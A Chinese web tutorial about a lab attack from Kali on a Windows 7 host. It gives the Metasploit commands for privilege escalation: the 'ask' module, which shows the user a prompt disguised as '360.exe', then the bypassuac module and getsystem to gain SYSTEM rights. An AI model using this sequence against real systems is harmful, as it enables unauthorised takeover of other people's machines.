溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

發(fā)布時間:2021-12-10 09:17:51 來源:億速云 閱讀:165 作者:柒染 欄目:大數(shù)據(jù)

這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

環(huán)境:攻:Kali 2020,ip:192.168.1.133

          受:win7 x86,ip:192.168.1.137

一、生成木馬及監(jiān)聽主機:

 提升權(quán)限

二、提升權(quán)限

1、將當(dāng)前session放到后臺,background

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

2、選擇提權(quán)模塊,use exploit/windows/local/ask

3、查看需要配置的參數(shù),show options

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

3、查看并設(shè)置當(dāng)前sessions值,set session 2

4、設(shè)置彈出程序的名字,set filename 360.exe

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

5、run,小受會彈出一個對話框,點擊是,即可獲取系統(tǒng)權(quán)限

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

三、UAC繞過(需要在管理組)

1、上面的方法由于需要交互,如果向省去交互的步驟,可以利用下面的bypassuac模塊繞過彈窗

2、選擇模塊:use exploit/windows/local/bypassuac

3、查看并設(shè)置當(dāng)前sessions值,set session 1

4、run,不用進行交互

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

5、查看權(quán)限用命令getuid,提示還是普通權(quán)限,然后通過命令getsystem獲取系統(tǒng)權(quán)限,再用getuid查看權(quán)限,發(fā)現(xiàn)以獲取系統(tǒng)權(quán)限,如果不操作上面的步驟,用命令getsystem,會提示獲取失敗

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

上述就是小編為大家分享的大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI